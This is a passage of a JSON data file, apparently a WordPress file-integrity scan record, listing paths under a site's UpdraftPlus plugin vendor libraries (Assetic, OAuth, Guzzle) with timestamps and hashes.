},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/CssMinFilter.php\":{\"d\":1545638163,\"h\":\"5daaeefe85b17daf69595403e8983ff7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/JSqueezeFilter.php\":{\"d\":1545638163,\"h\":\"8a70e1ea150955d09ccb62abddbcbc2c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/CleanCssFilter.php\":{\"d\":1545638163,\"h\":\"bfe1b1f5292ab23772e10ed201b73011\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/UglifyCssFilter.php\":{\"d\":1545638163,\"h\":\"2b47f892a042c7dc1e3065bf3597a70d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/StylusFilter.php\":{\"d\":1545638163,\"h\":\"9e06c556025222036952e73a88ef7c2f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/EmberPrecompileFilter.php\":{\"d\":1545638163,\"h\":\"019aea13b90f9298639bab925515b38e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/JSMinPlusFilter.php\":{\"d\":1545638163,\"h\":\"73387e60d678a953b4e95482ff92dc33\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Factory\\/Resource\\/FileResource.php\":{\"d\":1545638163,\"h\":\"a9b13ed670abe406fd9d76ad9e89c4ca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Factory\\/Resource\\/DirectoryResource.php\":{\"d\":1545638163,\"h\":\"17071d81dd399da6b201ae5e274ae19c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Factory\\/Resource\\/ResourceInterface.php\":{\"d\":1545638163,\"h\":\"0daab2b0066681d6d371c78f74d9a018\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Factory\\/Resource\\/CoalescingDirectoryResource.php\":{\"d\":1545638163,\"h\":\"52f51cf4560fe7aa0e089ca2ed5fbcce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Factory\\/Resource\\/IteratorResourceInterface.php\":{\"d\":1545638163,\"h\":\"21fcc88cd4254ca842fae97b54135c1f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Factory\\/Loader\\/FormulaLoaderInterface.php\":{\"d\":1545638163,\"h\":\"bdbeedf4ee519f6f834001f88248238d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Factory\\/Loader\\/BasePhpFormulaLoader.php\":{\"d\":1545638163,\"h\":\"d3fa352c5e699bc2f4eba9d24de3ab45\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Factory\\/Loader\\/FunctionCallsFormulaLoader.php\":{\"d\":1545638163,\"h\":\"d486b4e187d35d0d804e87caf5fa6a1c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Factory\\/Loader\\/CachedFormulaLoader.php\":{\"d\":1545638163,\"h\":\"0f0a591d6e7dd3d1e037917e200e005c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Factory\\/Worker\\/WorkerInterface.php\":{\"d\":1545638163,\"h\":\"43abd5b5e29fc3d25faf7c0a72d785b0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Factory\\/Worker\\/CacheBustingWorker.php\":{\"d\":1545638163,\"h\":\"17a782bb92462b13d92f072ab38c28fa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Factory\\/Worker\\/EnsureFilterWorker.php\":{\"d\":1545638163,\"h\":\"8b7d7a37239b0415ade573a283467823\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Factory\\/AssetFactory.php\":{\"d\":1545638163,\"h\":\"565280ef2ec5ecd81efbea81721eadb7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Factory\\/LazyAssetManager.php\":{\"d\":1545638163,\"h\":\"ca9685e1091fb7bca19244ff9815a059\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Asset\\/Iterator\\/AssetCollectionIterator.php\":{\"d\":1545638163,\"h\":\"ee2e05ecd36499b9da598b29d8fbe94c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Asset\\/Iterator\\/AssetCollectionFilterIterator.php\":{\"d\":1545638163,\"h\":\"37d2aee6e33c248aecd99b200f071bd3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Asset\\/AssetCache.php\":{\"d\":1545638163,\"h\":\"8f651267a54aebfa9c4dd99da2485cda\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Asset\\/AssetCollectionInterface.php\":{\"d\":1545638163,\"h\":\"6bd0d13e1839e6c7a6968c3accadb9c0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Asset\\/StringAsset.php\":{\"d\":1545638163,\"h\":\"aa6a980ce254f3b9574dbf49fa4d658d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Asset\\/FileAsset.php\":{\"d\":1545638163,\"h\":\"c7710685d9e9a767ab2424ac01e8356b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Asset\\/GlobAsset.php\":{\"d\":1545638163,\"h\":\"8e4934524a4381304e42d4fcc5dc3efd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Asset\\/BaseAsset.php\":{\"d\":1545638163,\"h\":\"3158773fd1e3b7ce6d8d5c8791c1b724\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Asset\\/AssetCollection.php\":{\"d\":1545638163,\"h\":\"ce42d3efa7089de567e218c1cc2fbb6d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Asset\\/AssetInterface.php\":{\"d\":1545638163,\"h\":\"e2017d9e2f6da17d060786bbe8e7a191\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Asset\\/AssetReference.php\":{\"d\":1545638163,\"h\":\"8595d3af872d062fd0cdde030effc12d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Asset\\/HttpAsset.php\":{\"d\":1545638163,\"h\":\"5b473fdd686df0308e625f1499f116f9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Util\\/CssUtils.php\":{\"d\":1545638163,\"h\":\"52b66f2cfb574e9c53118c8ee243aac3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Util\\/SassUtils.php\":{\"d\":1545638163,\"h\":\"0bbb1562b2c86e1bf5f052314db11cc2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Util\\/FilesystemUtils.php\":{\"d\":1545638163,\"h\":\"a7d69645319835af7a488a4b4b6d6759\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Util\\/VarUtils.php\":{\"d\":1545638167,\"h\":\"b17d97ed88d8e22e266fcd94abed9669\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Util\\/TraversableString.php\":{\"d\":1545638167,\"h\":\"8c2f2e7b23443d9d44e6ca6811b87048\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Util\\/LessUtils.php\":{\"d\":1545638167,\"h\":\"e24a2efdf6de280b8d132925a774a614\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Cache\\/FilesystemCache.php\":{\"d\":1545638167,\"h\":\"23d6f4e79ebb2188052725c03815b790\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Cache\\/ExpiringCache.php\":{\"d\":1545638167,\"h\":\"d92f56984453402c8d9d32087e5ed4a1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Cache\\/CacheInterface.php\":{\"d\":1545638167,\"h\":\"bdce881b2020ff43b6728eab1ab1d860\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Cache\\/ApcCache.php\":{\"d\":1545638167,\"h\":\"f063732ac720861dbf95dda68f2c5215\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Cache\\/ConfigCache.php\":{\"d\":1545638167,\"h\":\"8dc11c682db58dd7c35361d9aceeb6e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Cache\\/ArrayCache.php\":{\"d\":1545638167,\"h\":\"9b6584f20132f94364d96ece06ecbbec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Extension\\/Twig\\/TwigResource.php\":{\"d\":1545638167,\"h\":\"d637bef085facf392fb257be399c7c76\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Extension\\/Twig\\/AsseticFilterNode.php\":{\"d\":1545638167,\"h\":\"3d1e57d2297d816e187f2b53d2967302\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Extension\\/Twig\\/AsseticTokenParser.php\":{\"d\":1545638167,\"h\":\"51589e834a752a92550d66d15d4f2a4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Extension\\/Twig\\/AsseticExtension.php\":{\"d\":1545638167,\"h\":\"1b771f60cc957e91be3f5020331a14ac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Extension\\/Twig\\/AsseticFilterFunction.php\":{\"d\":1545638167,\"h\":\"d737e27da8a958ae13b67affbe4195f8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Extension\\/Twig\\/AsseticFilterInvoker.php\":{\"d\":1545638167,\"h\":\"ef7c3ad919f2611702fba1d87dfc7c78\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Extension\\/Twig\\/AsseticNode.php\":{\"d\":1545638167,\"h\":\"d187cb804b619dae5c87e3637854dd79\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Extension\\/Twig\\/TwigFormulaLoader.php\":{\"d\":1545638167,\"h\":\"db7cadf1d6e237463033bb1d6a55a7bb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Extension\\/Twig\\/ValueContainer.php\":{\"d\":1545638167,\"h\":\"47ee345940ef5a6d2fdc8c9676da2505\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/ValueSupplierInterface.php\":{\"d\":1545638163,\"h\":\"88e060dfb4c19f27a06ef4023e090360\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/FilterManager.php\":{\"d\":1545638163,\"h\":\"464c72c1c92802a7f3fad89f4bd04717\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/AssetWriter.php\":{\"d\":1545638167,\"h\":\"42c3da49809262205e77f7a5dd4608e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/AssetManager.php\":{\"d\":1545638167,\"h\":\"5160c6415b0a5c61bff700168193f296\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/functions.php\":{\"d\":1545638167,\"h\":\"6bd4c46757a3b49d2d5a8f56c9009b8d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/package.json\":{\"d\":1545638163,\"h\":\"ca7b50d4ff15b0321ecbb96b58d34195\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/README.md\":{\"d\":1545638163,\"h\":\"c74fb7cfc6929c7eb5f4a1611feeb388\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/Gemfile\":{\"d\":1545638163,\"h\":\"1f774651420e7fdf6dfa0d659766cb12\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/CHANGELOG-1.2.md\":{\"d\":1545638163,\"h\":\"4bdcb57cef582fd682d3c841bae8adc9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/LICENSE\":{\"d\":1545638163,\"h\":\"f940d8460878681568eab4fe3688aa02\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/CHANGELOG-1.0.md\":{\"d\":1545638163,\"h\":\"f6daed631ce93b30912849de3eba4b0d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/CHANGELOG-1.1.md\":{\"d\":1545638167,\"h\":\"8d7886d4be1c23392086232d94de633b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/composer.json\":{\"d\":1545638167,\"h\":\"77ea9b36e1adb06300e80efe18878523\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/eher\\/oauth\\/src\\/Eher\\/OAuth\\/Request.php\":{\"d\":1545638167,\"h\":\"6fe4a1f7583e3e4c5a34820ef3be5cf8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/eher\\/oauth\\/src\\/Eher\\/OAuth\\/SignatureMethod.php\":{\"d\":1545638167,\"h\":\"177877f5a22bc13b6178a8f7186a747c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/eher\\/oauth\\/src\\/Eher\\/OAuth\\/OAuthServer.php\":{\"d\":1545638167,\"h\":\"d379703f6d7fdf7da5c7dffd80d0c9f8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/eher\\/oauth\\/src\\/Eher\\/OAuth\\/PlainText.php\":{\"d\":1545638167,\"h\":\"b8607c9bc7e132a1190bd36ab23fce33\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/eher\\/oauth\\/src\\/Eher\\/OAuth\\/OAuthException.php\":{\"d\":1545638167,\"h\":\"22d8c88d80a2620c08cd19e878772951\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/eher\\/oauth\\/src\\/Eher\\/OAuth\\/Util.php\":{\"d\":1545638167,\"h\":\"80c27412adf13ecde45899d05121568b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/eher\\/oauth\\/src\\/Eher\\/OAuth\\/HmacSha1.php\":{\"d\":1545638167,\"h\":\"e9f29e65eaaeb24935c5f0367b963455\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/eher\\/oauth\\/src\\/Eher\\/OAuth\\/OAuthDataStore.php\":{\"d\":1545638167,\"h\":\"fdf9abc01528fa49eed4d7f0fdc2c959\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/eher\\/oauth\\/src\\/Eher\\/OAuth\\/Token.php\":{\"d\":1545638167,\"h\":\"8671bf77b5c03c1a95172d368002dd30\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/eher\\/oauth\\/src\\/Eher\\/OAuth\\/RsaSha1.php\":{\"d\":1545638167,\"h\":\"73b8a7fbb8d709d7b5f546f361ae3ed4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/eher\\/oauth\\/src\\/Eher\\/OAuth\\/Consumer.php\":{\"d\":1545638167,\"h\":\"05cefae7cd3cbfaf4d8357fcd0eaea7a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/eher\\/oauth\\/README.md\":{\"d\":1545638167,\"h\":\"be05b28e8661d86f6eaa23e785b5fdf6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/eher\\/oauth\\/composer.json\":{\"d\":1545638167,\"h\":\"5c513935c1b16abe2a3e82d74c7158c0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/eher\\/oauth\\/phpunit.xml.dist\":{\"d\":1545638167,\"h\":\"7bb36f119cff75b457d709d6e93adedc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Inflection\\/MemoizingInflector.php\":{\"d\":1545638167,\"h\":\"990be5be097a292ed84e3ce5515754ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Inflection\\/PreComputedInflector.php\":{\"d\":1545638167,\"h\":\"9f2b03877e501cfefe8f1ef2f616c133\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Inflection\\/Inflector.php\":{\"d\":1545638167,\"h\":\"af099fa9a6f19542cd50dc4b9e53c630\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Inflection\\/composer.json\":{\"d\":1545638167,\"h\":\"2ebd37b7a54e3fbb67b00c4b7f0d7d5c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Inflection\\/InflectorInterface.php\":{\"d\":1545638167,\"h\":\"a575fde89bf5331c554754e83eb82dd0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Md5\\/CommandContentMd5Plugin.php\":{\"d\":1545638167,\"h\":\"fceaf6b488b364494a019a3edeea5ca7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Md5\\/Md5ValidatorPlugin.php\":{\"d\":1545638167,\"h\":\"10de21872b9a766dd9b7c6deb27ce7e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Md5\\/composer.json\":{\"d\":1545638167,\"h\":\"6ad90b0c9b60d4cc6e9a68edfb590d60\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Async\\/AsyncPlugin.php\":{\"d\":1545638167,\"h\":\"12ec1382a5c2c4d2c76bca740610fcf9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Async\\/composer.json\":{\"d\":1545638167,\"h\":\"15dbadaebcbe675a5dcd8369374e571b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/CurlAuth\\/composer.json\":{\"d\":1545638167,\"h\":\"8e37c2df0628bf5d2f814933e017e722\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/CurlAuth\\/CurlAuthPlugin.php\":{\"d\":1545638167,\"h\":\"358c6af63ea1143f7ec0d05b2dc87b9f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Oauth\\/composer.json\":{\"d\":1545638167,\"h\":\"ae1e00ae9c81ac6f9ed6acc4bc712a1e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Oauth\\/OauthPlugin.php\":{\"d\":1545638167,\"h\":\"5fab9b6d4196420d914d872546f951e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Backoff\\/LinearBackoffStrategy.php\":{\"d\":1545638167,\"h\":\"f91a338afaa2d8c55d5e00ce739e1f6d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Backoff\\/ExponentialBackoffStrategy.php\":{\"d\":1545638167,\"h\":\"9c199d621974ad2c70c437629d54fdb4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Backoff\\/AbstractErrorCodeBackoffStrategy.php\":{\"d\":1545638167,\"h\":\"5308b4c3bfa331b1feec2e886bf1e38d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Backoff\\/HttpBackoffStrategy.php\":{\"d\":1545638167,\"h\":\"4443aff69969039d756e3580b1353067\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Backoff\\/TruncatedBackoffStrategy.php\":{\"d\":1545638167,\"h\":\"86af5b5166fff87b89c24214cb399841\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Backoff\\/CurlBackoffStrategy.php\":{\"d\":1545638167,\"h\":\"7a00f8bdddbd441eed9268c4bb250399\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Backoff\\/ReasonPhraseBackoffStrategy.php\":{\"d\":1545638167,\"h\":\"0245fa4a73cd4071b14e0595423e0430\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Backoff\\/BackoffStrategyInterface.p